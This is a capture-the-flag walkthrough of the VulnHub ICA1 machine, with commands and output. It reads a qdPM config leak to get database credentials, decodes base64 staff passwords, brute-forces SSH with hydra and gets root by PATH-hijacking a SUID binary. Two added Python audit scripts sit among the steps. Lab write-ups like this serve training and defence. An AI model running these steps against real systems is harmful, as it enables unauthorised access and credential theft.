Target VM download link: https://download.vulnhub.com/ica/ica1.zip
Check the IP of the current network interface
┌──(kali㉿kali)-[~]
└─$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.56.102 netmask 255.255.255.0 broadcast 192.168.56.255
inet6 fe80::20c:29ff:feea:9e42 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:ea:9e:42 txqueuelen 1000 (Ethernet)
RX packets 2 bytes 1180 (1.1 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 12 bytes 1480 (1.4 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 8 bytes 400 (400.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 8 bytes 400 (400.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Quick scan for live hosts on the current network
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sP -sn -n -T4 --host-timeout 5 192.168.56.0/24
[sudo] password for kali:
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-22 07:41 EST
Nmap scan report for 192.168.56.1
Host is up (0.00017s latency).
MAC Address: 0A:00:27:00:00:1C (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.00013s latency).
MAC Address: 08:00:27:91:8F:1F (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.101
Host is up (0.00032s latency).
MAC Address: 08:00:27:7D:52:AC (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.102
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 1.93 seconds
Target host 192.168.56.101 found; run a port and script scan against it
┌──(kali㉿kali)-[~/Desktop/Libs/192.168.56.101]
└─$ nmap -A -oN nmap.txt 192.168.56.101
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-22 07:45 EST
Nmap scan report for 192.168.56.101
Host is up (0.00041s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 0e:77:d9:cb:f8:05:41:b9:e4:45:71:c1:01:ac:da:93 (RSA)
| 256 40:51:93:4b:f8:37:85:fd:a5:f4:d7:27:41:6c:a0:a5 (ECDSA)
|_ 256 09:85:60:c5:35:c1:4d:83:76:93:fb:c7:f0:cd:7b:8e (ED25519)
80/tcp open http Apache httpd 2.4.48 ((Debian))
|_http-title: qdPM | Login
|_http-server-header: Apache/2.4.48 (Debian)
3306/tcp open mysql MySQL 8.0.26
| mysql-info:
| Protocol: 10
| Version: 8.0.26
| Thread ID: 11
| Capabilities flags: 65535
| Some Capabilities: Support41Auth, Speaks41ProtocolOld, FoundRows, IgnoreSigpipes, SupportsTransactions, SupportsCompression, InteractiveClient, LongPassword, SwitchToSSLAfterHandshake, DontAllowDatabaseTableColumn, IgnoreSpaceBeforeParenthesis, LongColumnFlag, ConnectWithDatabase, Speaks41ProtocolNew, SupportsLoadDataLocal, ODBCClient, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
| Status: Autocommit
| Salt: \x04)W(\x1E{\x15\x06\x11beTrS\x01\x15!OQJ
|_ Auth Plugin Name: caching_sha2_password
| ssl-cert: Subject: commonName=MySQL_Server_8.0.26_Auto_Generated_Server_Certificate
| Not valid before: 2021-09-25T10:47:29
|_Not valid after: 2031-09-23T10:47:29
|_ssl-date: TLS randomness does not represent time
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.19 seconds
Open ports found: 22, 80 and 3306. Opening the page on port 80 shows the site is qdPM 9.2; search for known vulnerabilities.
┌──(kali㉿kali)-[~/Desktop/Libs/192.168.56.101]
└─$ searchsploit qdPM 9.2
------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
qdPM 9.2 - Password Exposure (Unauthenticated) | php/webapps/50176.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No Results
Look at the vulnerability description
┌──(kali㉿kali)-[~/Desktop/Libs/192.168.56.101]
└─$ cat /usr/share/exploitdb/exploits/php/webapps/50176.txt
The password and connection string for the database are stored in a yml file. To access the yml file you can go to http://<website>/core/config/databases.yml file and download.
In short: requesting http://<website>/core/config/databases.yml returns the database configuration file. Download it and inspect it.
┌──(kali㉿kali)-[~/Desktop/Libs/192.168.56.101]
└─$ curl -o databases.yml http://192.168.56.101/core/config/databases.yml
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 283 100 283 0 0 186k 0 --:--:-- --:--:-- --:--:-- 276k
┌──(kali㉿kali)-[~/Desktop/Libs/192.168.56.101]
└─$ cat databases.yml
all:
  doctrine:
    class: sfDoctrineDatabase
    param:
      dsn: 'mysql:dbname=qdpm;host=localhost'
      profiler: false
      username: qdpmadmin
      password: "<?php echo urlencode('UcVQCMQk2STVeS6J') ; ?>"
      attributes:
        quote_identifier: true
Evaluate the PHP expression to get the password
┌──(kali㉿kali)-[~/Desktop/Libs/192.168.56.101]
└─$ vim pass.php
┌──(kali㉿kali)-[~/Desktop/Libs/192.168.56.101]
└─$ cat pass.php
<?php echo urlencode('UcVQCMQk2STVeS6J') ; ?>
┌──(kali㉿kali)-[~/Desktop/Libs/192.168.56.101]
└─$ php pass.php
UcVQCMQk2STVeS6J
Database details obtained: database name qdpm, username qdpmadmin, password UcVQCMQk2STVeS6J
Log in to the database
┌──(kali㉿kali)-[~/Desktop/Libs/192.168.56.101]
└─$ mysql -h192.168.56.101 -uqdpmadmin -pUcVQCMQk2STVeS6J
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 46
Server version: 8.0.26 MySQL Community Server - GPL
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
List the existing databases
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| qdpm |
| staff |
| sys |
+--------------------+
6 rows in set (0.013 sec)
List the tables in the staff database
MySQL [(none)]> use staff
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [staff]> show tables;
+-----------------+
| Tables_in_staff |
+-----------------+
| department |
| login |
| user |
+-----------------+
3 rows in set (0.002 sec)
Look at the user table and the login table
MySQL [staff]> select * from user;
+------+---------------+--------+---------------------------+
| id | department_id | name | role |
+------+---------------+--------+---------------------------+
| 1 | 1 | Smith | Cyber Security Specialist |
| 2 | 2 | Lucas | Computer Engineer |
| 3 | 1 | Travis | Intelligence Specialist |
| 4 | 1 | Dexter | Cyber Security Analyst |
| 5 | 2 | Meyer | Genetic Engineer |
+------+---------------+--------+---------------------------+
5 rows in set (0.011 sec)
MySQL [staff]> select * from login
-> ;
+------+---------+--------------------------+
| id | user_id | password |
+------+---------+--------------------------+
| 1 | 2 | c3VSSkFkR3dMcDhkeTNyRg== |
| 2 | 4 | N1p3VjRxdGc0MmNtVVhHWA== |
| 3 | 1 | WDdNUWtQM1cyOWZld0hkQw== |
| 4 | 3 | REpjZVZ5OThXMjhZN3dMZw== |
| 5 | 5 | Y3FObkJXQ0J5UzJEdUpTeQ== |
+------+---------+--------------------------+
5 rows in set (0.002 sec)
Save the usernames and passwords
┌──(kali㉿kali)-[~/Desktop/Libs/192.168.56.101]
└─$ echo "smith" >> user.txt
┌──(kali㉿kali)-[~/Desktop/Libs/192.168.56.101]
└─$ echo "lucas" >> user.txt
┌──(kali㉿kali)-[~/Desktop/Libs/192.168.56.101]
└─$ echo "travis" >> user.txt
┌──(kali㉿kali)-[~/Desktop/Libs/192.168.56.101]
└─$ echo "dexter" >> user.txt
┌──(kali㉿kali)-[~/Desktop/Libs/192.168.56.101]
└─$ echo "meyer" >> user.txt
┌──(kali㉿kali)-[~/Desktop/Libs/192.168.56.101]
└─$ cat user.txt
smith
lucas
travis
dexter
meyer
┌──(kali㉿kali)-[~/Desktop/Libs/192.168.56.101]
└─$ echo "c3VSSkFkR3dMcDhkeTNyRg==" | base64 -d >> pass.txt && echo "" >> pass.txt
┌──(kali㉿kali)-[~/Desktop/Libs/192.168.56.101]
└─$ echo "N1p3VjRxdGc0MmNtVVhHWA==" | base64 -d >> pass.txt && echo "" >> pass.txt
┌──(kali㉿kali)-[~/Desktop/Libs/192.168.56.101]
└─$ echo "WDdNUWtQM1cyOWZld0hkQw==" | base64 -d >> pass.txt && echo "" >> pass.txt
┌──(kali㉿kali)-[~/Desktop/Libs/192.168.56.101]
└─$ echo "REpjZVZ5OThXMjhZN3dMZw==" | base64 -d >> pass.txt && echo "" >> pass.txt
┌──(kali㉿kali)-[~/Desktop/Libs/192.168.56.101]
└─$ echo "Y3FObkJXQ0J5UzJEdUpTeQ==" | base64 -d >> pass.txt && echo "" >> pass.txt
┌──(kali㉿kali)-[~/Desktop/Libs/192.168.56.101]
└─$ cat pass.txt
suRJAdGwLp8dy3rF
7ZwV4qtg42cmUXGX
X7MQkP3W29fewHdC
DJceVy98W28Y7wLg
cqNnBWCByS2DuJSy
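The five echo | base64 -d calls above show that staff.login stores passwords as base64, an encoding that is reversible, rather than as hashes. The following Python script is an added example (not part of this write-up) that performs the same check programmatically, the way a password-storage audit would: it parses the two mysql table dumps, joins login.user_id to user.id, and reports every stored value that decodes to printable ASCII. The table text is a constructed copy of the dumps printed above; the function names are my own.

```python
import base64
import binascii

# Constructed copies of the two dumps printed above (embedded so the script
# runs offline; only the rows shown in the write-up are included).
USER_DUMP = """
+------+---------------+--------+---------------------------+
| id   | department_id | name   | role                      |
+------+---------------+--------+---------------------------+
| 1    | 1             | Smith  | Cyber Security Specialist |
| 2    | 2             | Lucas  | Computer Engineer         |
| 3    | 1             | Travis | Intelligence Specialist   |
| 4    | 1             | Dexter | Cyber Security Analyst    |
| 5    | 2             | Meyer  | Genetic Engineer          |
+------+---------------+--------+---------------------------+
"""

LOGIN_DUMP = """
+------+---------+--------------------------+
| id   | user_id | password                 |
+------+---------+--------------------------+
| 1    | 2       | c3VSSkFkR3dMcDhkeTNyRg== |
| 2    | 4       | N1p3VjRxdGc0MmNtVVhHWA== |
| 3    | 1       | WDdNUWtQM1cyOWZld0hkQw== |
| 4    | 3       | REpjZVZ5OThXMjhZN3dMZw== |
| 5    | 5       | Y3FObkJXQ0J5UzJEdUpTeQ== |
+------+---------+--------------------------+
"""


def parse_mysql_table(dump):
    """Turn the ASCII table the mysql client prints into a list of dicts.
    Border lines (+----+) are skipped; the first pipe-delimited row is the header."""
    rows = []
    header = None
    for line in dump.splitlines():
        line = line.strip()
        if not line.startswith("|"):
            continue
        cells = [c.strip() for c in line.strip("|").split("|")]
        if header is None:
            header = cells
        else:
            rows.append(dict(zip(header, cells)))
    return rows


def decode_stored_secret(value):
    """Return the decoded text if `value` is base64 of printable ASCII, else None.
    A real password hash (bcrypt, SHA-crypt, ...) never decodes this way, so a
    non-None result means the column holds a recoverable password."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if text.isprintable() else None


def recover_credentials(user_dump, login_dump):
    """Join staff.login to staff.user on user_id and decode each stored value.
    Returns {lowercase name: decoded password} for every row that decodes."""
    users = {r["id"]: r["name"] for r in parse_mysql_table(user_dump)}
    creds = {}
    for row in parse_mysql_table(login_dump):
        name = users.get(row["user_id"])
        decoded = decode_stored_secret(row["password"])
        if name and decoded is not None:
            creds[name.lower()] = decoded
    return creds


if __name__ == "__main__":
    for user, password in recover_credentials(USER_DUMP, LOGIN_DUMP).items():
        print(f"{user}:{password}")
```

Every row decodes, which is the finding: the fix on the application side is to store a salted password hash (bcrypt or similar) in staff.login, and the same script returns an empty result once that is done, because decode_stored_secret() rejects hash strings.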
Brute-force SSH with the credentials obtained
┌──(kali㉿kali)-[~/Desktop/Libs/192.168.56.101]
└─$ hydra -L user.txt -P pass.txt ssh://192.168.56.101
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-22 09:53:52
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 25 login tries (l:5/p:5), ~2 tries per task
[DATA] attacking ssh://192.168.56.101:22/
[22][ssh] host: 192.168.56.101 login: travis password: DJceVy98W28Y7wLg
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-12-22 09:54:00
Log in over SSH with the cracked credentials
┌──(kali㉿kali)-[~/Desktop/Libs/192.168.56.101]
└─$ ssh travis@192.168.56.101
travis@192.168.56.101's password:
Linux debian 5.10.0-8-amd64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Dec 10 10:33:02 2021 from 192.168.1.12
travis@debian:~$
Look for files that could be used for privilege escalation
travis@debian:~$ find / -user root -perm -4000 2>/dev/null
/opt/get_access
/usr/bin/chfn
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
Download /opt/get_access to the local machine
┌──(kali㉿kali)-[~/Desktop/Libs/192.168.56.101]
└─$ scp travis@192.168.56.101:/opt/get_access ./
travis@192.168.56.101's password:
get_access 100% 16KB 8.2MB/s 00:00
Use the strings command to look at the strings inside it
┌──(kali㉿kali)-[~/Desktop/Libs/192.168.56.101]
└─$ strings get_access
/lib64/ld-linux-x86-64.so.2
setuid
socket
puts
system
__cxa_finalize
setgid
__libc_start_main
libc.so.6
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
cat /root/system.info
Could not create socket to access to the system.
All services are disabled. Accessing to the system is allowed only within working hours.
;*3$"
GCC: (Debian 10.2.1-6) 10.2.1 20210110
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.0
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
get_access.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
puts@GLIBC_2.2.5
_edata
system@GLIBC_2.2.5
__libc_start_main@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
setgid@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
setuid@GLIBC_2.2.5
__cxa_finalize@GLIBC_2.2.5
socket@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment
The binary runs cat /root/system.info, so try creating a malicious cat command
travis@debian:~$ cd /tmp
travis@debian:/tmp$ echo "/bin/bash" >> cat
travis@debian:/tmp$ chmod a+x cat
travis@debian:/tmp$ export PATH=/tmp:$PATH
travis@debian:/tmp$ echo $PATH
/tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
travis@debian:/tmp$
Run /opt/get_access
travis@debian:/tmp$ /opt/get_access
root@debian:/tmp
uid=0(root) gid=0(root) groups=0(root),33(www-data),1002(travis)
root@debian:/tmp
Successfully escalated to root
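The escalation works because get_access calls system() with the bare command name cat, which /bin/sh resolves through the caller's PATH even though the binary runs as root. As an added example (not part of this write-up), the Python script below implements the check a defender would run over the SUID binaries enumerated with the find command above: it extracts printable strings the way strings(1) does, notes whether the binary imports a PATH-resolving spawner (system, popen, execvp, execlp) and privilege calls (setuid/setgid), and flags embedded command lines whose first word is not an absolute path. SAMPLE_BINARY is a constructed byte blob carrying the strings shown above, not the real get_access file, and the function names are my own.

```python
import re
import sys

# Constructed stand-in for the get_access binary: a byte blob carrying the
# strings from the strings(1) output above, separated by NUL bytes. It is not
# the real ELF file; it only lets the audit run offline.
SAMPLE_BINARY = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 9
    + b"setuid\x00socket\x00puts\x00system\x00__cxa_finalize\x00setgid\x00"
    + b"__libc_start_main\x00libc.so.6\x00GLIBC_2.2.5\x00\x00"
    + b"cat /root/system.info\x00"
    + b"Could not create socket to access to the system.\x00"
    + b"All services are disabled. Accessing to the system is allowed only within working hours.\x00"
    + b"GCC: (Debian 10.2.1-6) 10.2.1 20210110\x00system@GLIBC_2.2.5\x00"
)

# libc calls that look a bare program name up in PATH (system/popen via /bin/sh -c).
PATH_RESOLVING_CALLS = {"system", "popen", "execvp", "execlp", "execvpe"}
PRIVILEGE_CALLS = {"setuid", "setgid", "seteuid", "setegid", "setresuid", "setresgid"}
SHELL_META = set("|;&><`$")
RELATIVE_CMD = re.compile(r"^[a-z0-9_.\-]+$")       # e.g. "cat"
ABSOLUTE_CMD = re.compile(r"^/[A-Za-z0-9_./\-]+$")  # e.g. "/bin/cat"


def extract_strings(blob, min_len=4):
    """Mimic strings(1): runs of printable ASCII at least min_len bytes long."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]


def classify_command(s):
    """Heuristic: does this string look like a shell command line?
    Returns "relative" when the first word would be looked up in PATH,
    "absolute" when it is a full path, None otherwise. A single bare word
    such as "id" is deliberately not classified, so this check is not exhaustive."""
    tokens = s.split()
    if len(tokens) < 2:
        return None
    has_path_arg = any(t.startswith("/") for t in tokens[1:])
    has_meta = any(c in SHELL_META for c in s)
    if not (has_path_arg or has_meta):
        return None
    if ABSOLUTE_CMD.match(tokens[0]):
        return "absolute"
    if RELATIVE_CMD.match(tokens[0]):
        return "relative"
    return None


def audit_binary(blob):
    """Summarise the PATH-hijack exposure of one binary from its strings alone."""
    strs = extract_strings(blob)
    # Dynamic symbol names may carry a version suffix ("system@GLIBC_2.2.5").
    symbols = {s.split("@", 1)[0] for s in strs}
    report = {
        "path_resolving_calls": sorted(symbols & PATH_RESOLVING_CALLS),
        "privilege_calls": sorted(symbols & PRIVILEGE_CALLS),
        "relative_commands": [],
        "absolute_commands": [],
    }
    for s in strs:
        kind = classify_command(s)
        if kind:
            report[kind + "_commands"].append(s)
    return report


def is_path_hijackable(report):
    """True when a PATH-resolving spawner is imported and at least one
    embedded command line starts with a bare (non-absolute) program name."""
    return bool(report["path_resolving_calls"]) and bool(report["relative_commands"])


if __name__ == "__main__":
    # Audit a file given on the command line, or fall back to the constructed sample.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_BINARY
    result = audit_binary(data)
    for key, value in result.items():
        print(f"{key}: {value}")
    print("PATH hijack risk:", "YES" if is_path_hijackable(result) else "no")
```

The report for the sample reads exactly like the case above: system imported, setuid/setgid present, and one relative command line. On the binary side the fix is to spawn with a fixed absolute path and argument vector (execve("/bin/cat", ...)) or to set PATH to a known value before calling system(); re-running the audit after that change lists the command under absolute_commands and no longer flags the file. The string-based heuristic only catches commands that are visible as literals, so it complements rather than replaces reviewing the source of any SUID program.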